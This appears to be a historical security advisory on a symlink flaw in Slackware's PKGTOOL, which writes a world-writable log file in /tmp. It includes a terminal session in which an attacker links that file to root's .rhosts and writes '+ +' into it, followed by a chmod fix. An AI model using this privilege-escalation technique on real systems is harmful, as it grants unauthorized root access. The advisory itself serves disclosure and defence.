Linux Slackware 3.0 or earlier


    PKGTOOL changes the permission of the /tmp/PKGTOOL.REMOVED to  add
    to it,  but the  permissions are  set READ/WRITE  for User, Group,
    Other.  If  the files does  not exist, the  attacker can create  a
    symlink to anyfile and then cat to it (IE: /root/.rhosts)

    If /tmp/PKGTOOL.REMOVED gets deleted  or hasn't been created  yet,
    any user can now create a symbolic link from  /tmp/PKGTOOL.REMOVED
    to ~root/.rhosts (for a generic  example).  The next time  PKGTOOL
    is run, which will more than likely be run by root,  ~root/.rhosts
    will be created as  a 666 file with  the logs from PKGTOOL  as its
    contents.  One may now simply do an

    echo "+ +" > /tmp/PKGTOOL.REMOVED, then rm /tmp/PKGTOOL.REMOVED

    For this example, root is the victim while hamors is the attacker:

    hamors (2 20:57) litterbox:/tmp> ls -al | grep PKG
    - - -rw-rw-rw-   1 root     root        16584 Aug 26 18:07 PKGTOOL.REMOVED.backup

    hamors (3 21:00) litterbox:/tmp> ln -s ~root/.rhosts PKGTOOL.REMOVED

    hamors (4 20:58) litterbox:/tmp> cat PKGTOOL.REMOVED
    cat: PKGTOOL.REMOVED: No such file or directory

    God (17 20:59) litterbox:~# pkgtool
      root now uses PKGTOOL to delete a package

    hamors (5 DING!) litterbox:/tmp> head PKGTOOL.REMOVED
    Removing package tcl:
    Removing files:

    hamors (6 21:00) litterbox:/tmp> echo "+ +" > PKGTOOL.REMOVED

    hamors (7 21:00) litterbox:/tmp> cat ~root/.rhosts
    + +


    chmod 700 pkgtool. Now, only install software as root.